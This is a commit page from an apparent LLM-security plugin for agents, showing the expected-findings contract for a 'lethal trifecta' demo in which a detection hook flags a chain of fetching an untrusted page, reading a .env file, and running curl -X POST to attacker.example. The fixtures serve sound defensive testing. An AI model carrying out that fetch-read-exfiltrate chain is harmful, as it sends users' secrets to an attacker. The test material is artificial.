Kjell Tore Guttormsen
583a78c6cc
Companion to 8df5d5c (which only carried the doc updates — the example
directories themselves were left out of staging by mistake). This
commit adds the actual example mappes:
- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs,
expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs,
expected-findings.md}
Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section
with a 4-row table covering malicious-skill-demo, prompt-injection-
showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the
state-isolation discipline notes.
Marketplace root README unchanged since plugin's outward coverage
is unchanged ([skip-docs] covers the marketplace-level gate).
58 lines
2.5 KiB
Markdown
58 lines
2.5 KiB
Markdown
# Expected Findings — Lethal Trifecta Walkthrough
|
|
|
|
This is the testable contract. `run-trifecta.mjs` exits 0 only when
|
|
every row matches.
|
|
|
|
## Sequence contract
|
|
|
|
| Step | Hook input | Expected hook stdout | Expected exit | OWASP |
|
|
|------|-----------|---------------------|---------------|-------|
|
|
| 1 | `{tool_name: "WebFetch", tool_input.url: "https://example.com/tutorial.html"}` | empty | 0 | — (single class only) |
|
|
| 2 | `{tool_name: "Read", tool_input.file_path: "/Users/example/project/.env"}` | empty | 0 | — (two classes, threshold not crossed) |
|
|
| 3 | `{tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak ..."}` | JSON `{systemMessage: "SECURITY ADVISORY (session-guard): Rule of Two violation ..."}` | 0 | LLM01, LLM02, ASI01, ASI02 |
|
|
| 4 | `{tool_name: "Bash", tool_input.command: "ls -la"}` | empty | 0 | — (neutral, suppression marker active) |
|
|
| 5 | `{tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak2 ..."}` | empty | 0 | — (warning marker still in window — suppressed) |
|
|
|
|
## Advisory content (step 3)
|
|
|
|
The `systemMessage` payload from step 3 must contain:
|
|
|
|
- The literal phrase `Rule of Two violation`
|
|
- A list of evidence items under `Untrusted input:`, `Data access:`,
|
|
`Exfil sink:` headings
|
|
- A reference to `Set LLM_SECURITY_TRIFECTA_MODE=` for configuration
|
|
- An OWASP tag mentioning `ASI01` or `ASI02`
|
|
|
|
Optional (depending on detail string and `policy.json` config):
|
|
|
|
- `[SENSITIVE]` marker on the .env path in the data-access list
|
|
- `[CRITICAL]` framing if `mcpInfo.concentrated` or `sensitiveExfil`
|
|
applies — for this walkthrough, `sensitiveExfil` is true, so the
|
|
advisory severity is `critical` in the audit-trail event
|
|
|
|
## Audit-trail side effect
|
|
|
|
When `LLM_SECURITY_AUDIT_LOG` (or `policy.json` `audit.log_path`) is
|
|
set, step 3 writes a JSONL event:
|
|
|
|
```json
|
|
{
|
|
"event_type": "trifecta_warning",
|
|
"severity": "critical",
|
|
"source": "post-session-guard",
|
|
"details": { "evidence": {...}, "mcp_concentrated": false, "sensitive_exfil": true },
|
|
"owasp": ["ASI01", "ASI02", "LLM01"],
|
|
"action_taken": "warned"
|
|
}
|
|
```
|
|
|
|
The walkthrough does not configure the audit log — `writeAuditEvent`
|
|
no-ops when no path is set. To observe the audit-trail behaviour,
|
|
re-run with `LLM_SECURITY_AUDIT_LOG=/tmp/trifecta-audit.jsonl`.
|
|
|
|
## State file
|
|
|
|
- Written to `${os.tmpdir()}/llm-security-session-${run-trifecta-pid}.jsonl`
|
|
- Contains 5 entry rows + 1 warning marker after step 3 = 6 lines
|
|
- Deleted by `run-trifecta.mjs`'s `finally` block on exit
|
|
- No interaction with the user's real session state files
|